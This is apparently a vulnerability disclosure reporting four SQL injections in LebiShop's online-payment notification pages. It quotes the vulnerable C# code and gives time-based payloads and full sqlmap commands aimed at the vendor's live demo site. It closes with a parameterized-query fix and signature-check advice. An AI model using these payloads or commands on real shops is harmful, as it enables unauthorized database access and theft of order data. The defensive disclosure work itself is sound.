### Brief description:

Four SQL injections in the latest LebiShop e-commerce system (updated 2015-01-27)

### Details:

First: `LebiShop\onlinepay\dinpay\notify_url.aspx`, source as follows

```
protected void Page_Load(object sender, EventArgs e)
{
    string str = base.Request.Form["merchant_code"].ToString().Trim();
    string str2 = base.Request.Form["notify_type"].ToString().Trim();
    string str3 = base.Request.Form["notify_id"].ToString().Trim();
    base.Request.Form["interface_version"].ToString().Trim();
    base.Request.Form["sign_type"].ToString().Trim();
    string str4 = base.Request.Form["sign"].ToString().Trim();
    string code = base.Request.Form["order_no"].ToString().Trim();
    string str6 = base.Request.Form["order_time"].ToString().Trim();
    string str7 = base.Request.Form["order_amount"].ToString().Trim();
    string str8 = base.Request.Form["extra_return_param"].ToString().Trim();
    string outcode = base.Request.Form["trade_no"].ToString().Trim();
    string str10 = base.Request.Form["trade_time"].ToString().Trim();
    string str11 = base.Request.Form["trade_status"].ToString().Trim();
    string str12 = base.Request.Form["bank_seq_no"];
    string str13 = "";
    if ((str12 != null) && (str12 != ""))
    {
        str13 = str13 + "bank_seq_no=" + str12.ToString().Trim() + "&";
    }
    if ((str8 != null) && (str8 != ""))
    {
        str13 = str13 + "extra_return_param=" + str8 + "&";
    }
    str13 = (str13 + "interface_version=V3.0&") + "merchant_code=" + str + "&";
    if ((str3 != null) && (str3 != ""))
    {
        str13 = str13 + "notify_id=" + str3 + "&notify_type=" + str2 + "&";
    }
    str13 = ((((str13 + "order_amount=" + str7 + "&") + "order_no=" + code + "&") + "order_time=" + str6 + "&") + "trade_no=" + outcode + "&") + "trade_status=" + str11 + "&";
    if ((str10 != null) && (str10 != ""))
    {
        str13 = str13 + "trade_time=" + str10 + "&";
    }
    Lebi_OnlinePay onlinePay = Money.GetOnlinePay(code); // follow this
    ...
```

```
public static Lebi_OnlinePay GetOnlinePay(string code)
{
    return GetOnlinePay(B_Lebi_Order.GetModel("Code='" + code + "'")); // injection here
}
```

The second, third and fourth share the same code; the paths are

```
LebiShop\onlinepay\alipayDBJY\notify_url.aspx
LebiShop\onlinepay\alipayJSDZ\notify_url.aspx
LebiShop\onlinepay\alipaySJK\notify_url.aspx
```

The code is as follows

```
protected void Page_Load(object sender, EventArgs e)
{
    SortedDictionary<string, string> requestPost = this.GetRequestPost();
    string ordercode = base.Request.Form["out_trade_no"]; // not sanitized
    Lebi_Order model = B_Lebi_Order.GetModel("Code='" + ordercode + "'"); // injection here
    if (model == null)
    {
        base.Response.Write("系统错误");
        base.Response.End();
    }
    else if (requestPost.Count > 0)
    {
        Notify notify = new Notify(model);
        ...
```

Proof: first test against the vendor's official demo site to confirm that the injection exists. Visit

```
http://demo.lebi.cn/onlinepay/dinpay/notify_url.aspx
```

and POST

```
merchant_code=1&notify_type=1&notify_id=1&interface_version=1&sign_type=1&sign=1&order_time=1&order_amount=1&extra_return_param=1&trade_no=1&trade_time=1&trade_status=1&order_no=1
```

then POST

```
merchant_code=1&notify_type=1&notify_id=1&interface_version=1&sign_type=1&sign=1&order_time=1&order_amount=1&extra_return_param=1&trade_no=1&trade_time=1&trade_status=1&order_no=';waitfor delay '0:0:5';--
```

The second response is delayed, which confirms a time-based injection. Because the official site is behind a firewall, scanning it with a tool gets blocked (denied service). Scanning with sqlmap:

```
sqlmap -u "http://demo.lebi.cn/onlinepay/dinpay/notify_url.aspx" --data "merchant_code=1&notify_type=1&notify_id=1&interface_version=1&sign_type=1&sign=1&order_time=1&order_amount=1&extra_return_param=1&trade_no=1&trade_time=1&trade_status=1&order_no=1" -p "order_no" --dbms "mssql" --technique=T --current-db --time-sec 10
```

[![65.png](https://images.seebug.org/upload/201503/0221574224fe24eeb95a34c813708a66512716bd.png)](https://images.seebug.org/upload/201503/0221574224fe24eeb95a34c813708a66512716bd.png)

[![66.png](https://images.seebug.org/upload/201503/022158586776aea6a1504f47f1a01977e9383bdc.png)](https://images.seebug.org/upload/201503/022158586776aea6a1504f47f1a01977e9383bdc.png)

Proof for injections two, three and four: visit, respectively,

```
http://demo.lebi.cn/onlinepay/alipayDBJY/notify_url.aspx
http://demo.lebi.cn/onlinepay/alipayJSDZ/notify_url.aspx
http://demo.lebi.cn/onlinepay/alipaySJK/notify_url.aspx
```

and POST

```
out_trade_no=1
out_trade_no=1';waitfor delay '0:0:5';--
```

sqlmap scan:

```
sqlmap -u "http://demo.lebi.cn/onlinepay/alipaySJK/notify_url.aspx" --data "out_trade_no=1" --dbms "mssql" --technique=T --time-sec 10 --current-db
```

[![63.png](https://images.seebug.org/upload/201503/022150416435bcf2bea7fe5725cd78df79ea28e5.png)](https://images.seebug.org/upload/201503/022150416435bcf2bea7fe5725cd78df79ea28e5.png)

[![64.png](https://images.seebug.org/upload/201503/0221510014d9ab1272524bd03cf5403bd52cf922.png)](https://images.seebug.org/upload/201503/0221510014d9ab1272524bd03cf5403bd52cf922.png)

### Proof of vulnerability:

See the proof above.
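The root cause is identical in all four handlers: a value taken straight from `Request.Form` (`order_no` or `out_trade_no`) is concatenated into the `Code='...'` filter handed to `B_Lebi_Order.GetModel`, so a single quote ends the literal and the rest of the field becomes SQL. The following is an added example, not LebiShop's code, of how the same order lookup should be written: the order code is checked against an allow-list pattern and then bound as a typed ADO.NET parameter, so the `';waitfor delay` value from the proof above is rejected before any query runs, and even a value that passed the check would be compared as a literal string rather than parsed as SQL. The table and column names `Lebi_Order`/`Code`, the `OrderRecord` type, the `Amount` column and the 40-character code pattern are assumptions for illustration.

```csharp
using System;
using System.Data;
using System.Data.SqlClient;
using System.Text.RegularExpressions;

// Added example, not LebiShop code: table/column names and the record type are assumed.
public sealed class OrderRecord
{
    public string Code { get; set; }
    public decimal Amount { get; set; }
}

public static class SafeOrderLookup
{
    // Assumed format for an order code. An allow-list rejects quotes, semicolons
    // and whitespace outright, so SQL syntax never reaches the query at all.
    static readonly Regex OrderCodePattern =
        new Regex(@"^[A-Za-z0-9_-]{1,40}$", RegexOptions.Compiled);

    public static bool IsValidOrderCode(string code)
    {
        return !string.IsNullOrEmpty(code) && OrderCodePattern.IsMatch(code);
    }

    // The shape used by the vulnerable handlers: the attacker-controlled value
    // becomes part of the SQL text, so "';waitfor delay '0:0:5';--" changes the statement.
    public static string VulnerableWhere(string code)
    {
        return "Code='" + code + "'";
    }

    // Hardened form: the value travels as a typed parameter, never as SQL text.
    // Returns null both for a malformed code and for a code with no matching row.
    public static OrderRecord GetOrderByCode(SqlConnection conn, string code)
    {
        if (!IsValidOrderCode(code))
            return null;

        const string sql = "SELECT TOP 1 Code, Amount FROM Lebi_Order WHERE Code = @code";
        using (var cmd = new SqlCommand(sql, conn))
        {
            // Length-bounded NVARCHAR parameter; the driver sends it out of band
            // from the statement, so quoting inside the value is irrelevant.
            cmd.Parameters.Add("@code", SqlDbType.NVarChar, 40).Value = code;
            using (var reader = cmd.ExecuteReader())
            {
                if (!reader.Read())
                    return null;
                return new OrderRecord
                {
                    Code = reader.GetString(0),
                    Amount = reader.GetDecimal(1)
                };
            }
        }
    }
}
```

Two design points follow from the report. First, the time-based proof works only because the payload is executed as SQL; with the parameterized query the whole field is one string value, and `IsValidOrderCode("';waitfor delay '0:0:5';--")` returns false anyway. Second, in the dinpay handler the `sign` field is read and the signing string `str13` is assembled, yet `Money.GetOnlinePay(code)` is called before any of that is checked; ordering the handler so the gateway signature is verified before the database is touched means an unauthenticated caller never reaches the lookup at all, which is a worthwhile defence in depth on top of parameterization.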